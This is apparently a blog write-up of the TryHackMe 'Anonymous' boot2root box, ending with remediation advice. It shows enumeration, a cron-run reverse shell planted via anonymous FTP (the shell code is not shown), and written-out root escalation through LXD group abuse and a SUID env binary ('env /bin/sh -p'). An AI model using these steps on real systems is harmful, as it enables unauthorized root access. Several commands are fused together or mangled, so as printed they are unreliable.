Anonymous is a boot2root CTF on TryHackMe. It has medium difficulty. Initial access has been accomplished through injecting a reverse shell into a script on the FTP server. This script was run by a cronjob. After that privilege escalation to
root was done via a misconfigured SUID binary.
First of all we start a Nmap scan against the target.
sudo nmap 10.10.237.17 -sC -sV -p- -O -oN nmap/all
The SMB share can be enumerated with the
smbclient command. First of all the shares are listed.
smbclient -L //10.10.237.17/
In the next step the contents of the share was downloaded to the attacker machine. But these images did not contain any valuable information.
On the FTP server anonymous login is allowed.
The FTP server contains a
scripts folder. We have full access to this folder. Inside this folder there are three files. To be able to analyze these files, these files are downloaded to the attacker machine.
to_do.txt file does not contain any valuable information.
clean.sh and the
In the next step a reverse shell was placed into
After that the file was uploaded to the FTP server.
Next a listener was started with pwncat. After waiting for a while, the box has connected to the listener.
In the picture above, it can be clearly seen that the user
namelessone is part of the “lxd” group. This can be abused to gain a root shell. This website describes how this can be accomplished. First of all a container will be created on the attacker machine by running the following commands:
sudo apt updatesudo apt install -y golang-go debootstrap rsync gpg squashfs-toolsgo get -d -v github.com/lxc/distrobuildercd $HOME/go/src/github.com/lxc/distrobuildermakecdmkdir -p $HOME/ContainerImages/alpine/cd $HOME/ContainerImages/alpine/wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yamlsudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
Finally these files should be inside
Now these files have to be uploaded to the target. This can be easily accomplished with pwncat. After pressing
CTR + D the following commands will upload the
lxd.tar.xz and the
rootfs.squashfs files inside the
tmp folder of the target.
upload /home/kali/ContainerImages/alpine/lxd.tar.xz /tmp
upload /home/kali/ContainerImages/alpine/rootfs.squashfs /tmp
After that press
CTR + D again to get the shell as
Now the container has to build on the victim machine with the following commands.
cd /tmplxc image import lxd.tar.xz rootfs.squashfs — alias alpinelxd initlxc init alpine privesc -c security.privileged=truelxc config device add privesc host-root disk source\=/ path\=/mnt/root recursive\=true
Finally the container will be executed.
lxc start privesclxc exec privesc /bin/sh
Unfortunately I was not able to get the root flag with this way. So another privilege escalation had to be found. To find another attack vector the
LinEnum script has been used. This script is located
/opt/LinEnum/LinEnum.sh on my machine. It can be easily uploaded to the victim with pwncat.
upload /opt/LinEnum/LinEnum.sh /tmp/LinEnum.sh
Now it can be run from the
This script will also output binaries with the SUID bit set. Fortunately the
env binary has the SUID bit set.
This can be used to elevate privileges to root.
env /bin/sh -p
The FTP server should not allow anonymous login. If anonymous login is needed, then the anonymous user should not have access to sensitive information. Also an anonymous user should not have the privilege to write into an FTP folder. Furthermore
namelessone should not be part of the
lxd group, if not needed. Also the misconfiguration of the
env binary should be fixed.